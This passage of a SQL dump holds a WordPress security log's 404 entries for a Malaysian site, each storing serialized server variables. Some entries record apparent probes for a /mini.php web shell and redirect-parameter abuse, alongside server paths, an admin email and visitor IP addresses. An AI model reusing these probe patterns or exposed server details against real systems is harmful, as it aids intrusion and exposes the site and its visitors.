"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ842BypZvX7@gJ12mPdvwAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570715864.4859\";s:12:\"REQUEST_TIME\";s:10:\"1570715864\";}}','notice','2019-10-10 13:57:47','2019-10-10 13:57:44',34375024,36180240,'https://bintara.com.my/toughpad-fz-g1/',1,0,'207.46.13.141'),(27871,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:152:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5221.400 QQBrowser/10.0.1125.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"61.179.184.170\";s:11:\"REMOTE_PORT\";s:5:\"32391\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9H@hypZvX7@gJ12mPjWgAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570719738.4718\";s:12:\"REQUEST_TIME\";s:10:\"1570719738\";}}','notice','2019-10-10 15:02:20','2019-10-10 15:02:18',35034040,36839744,'https://bintara.com.my/?page_id=18',1,0,'61.179.184.170'),(27872,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"57078\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9fBAllZW5rbcASCZuGEgAAAVc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570725636.2424\";s:12:\"REQUEST_TIME\";s:10:\"1570725636\";}}','notice','2019-10-10 16:40:38','2019-10-10 16:40:36',35030520,36838544,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27873,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/?page_id=18%2Fcontact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:123:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:24:\"page_id=18%2Fcontact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"116.108.11.12\";s:11:\"REMOTE_PORT\";s:5:\"56965\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9jTz91bWS23sD@Q41atQAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570726735.6078\";s:12:\"REQUEST_TIME\";s:10:\"1570726735\";}}','notice','2019-10-10 16:58:58','2019-10-10 16:58:55',35427384,37236104,'https://bintara.com.my/?page_id=18%2Fcontact.php',1,0,'116.108.11.12'),(27874,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:122:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-artwork%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3371.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:120:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-artwork%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"61922\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9kJBypZvX7@gJ12mPvDAAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570726948.605\";s:12:\"REQUEST_TIME\";s:10:\"1570726948\";}}','notice','2019-10-10 17:02:30','2019-10-10 17:02:29',35035440,36837408,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-artwork%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27875,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3371.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"62128\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9kKQGDwjrWHcLbMJFmCgAAAMA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570726954.0692\";s:12:\"REQUEST_TIME\";s:10:\"1570726954\";}}','notice','2019-10-10 17:02:37','2019-10-10 17:02:34',35036784,36848408,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27876,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/mini.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ9kcxypZvX7@gJ12mPvKwAAAI4\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ9kcxypZvX7@gJ12mPvKwAAAI4\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.38.21\";s:11:\"REMOTE_PORT\";s:5:\"50696\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:10:\"SCRIPT_URL\";s:9:\"/mini.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9kcxypZvX7@gJ12mPvKwAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570727027.4635\";s:12:\"REQUEST_TIME\";s:10:\"1570727027\";}}','notice','2019-10-10 17:03:53','2019-10-10 17:03:47',35048272,36849272,'https://bintara.com.my/mini.php',1,0,'103.28.38.21'),(27877,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/mini.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ9kcxypZvX7@gJ12mPvKQAAAIs\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ9kcxypZvX7@gJ12mPvKQAAAIs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.38.21\";s:11:\"REMOTE_PORT\";s:5:\"50688\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:10:\"SCRIPT_URL\";s:9:\"/mini.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9kcxypZvX7@gJ12mPvKQAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570727027.1172\";s:12:\"REQUEST_TIME\";s:10:\"1570727027\";}}','notice','2019-10-10 17:03:53','2019-10-10 17:03:47',35048600,36853680,'https://bintara.com.my/mini.php',1,0,'103.28.38.21'),(27878,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/mini.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ9khhypZvX7@gJ12mPvMwAAAIg\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ9khhypZvX7@gJ12mPvMwAAAIg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.38.21\";s:11:\"REMOTE_PORT\";s:5:\"52546\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:10:\"SCRIPT_URL\";s:9:\"/mini.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9khhypZvX7@gJ12mPvMwAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570727047.5411\";s:12:\"REQUEST_TIME\";s:10:\"1570727047\";}}','notice','2019-10-10 17:04:09','2019-10-10 17:04:08',35042936,36846768,'https://bintara.com.my/mini.php',1,0,'103.28.38.21'),(27879,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/mini.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ9khhypZvX7@gJ12mPvNAAAAJI\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/mini.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ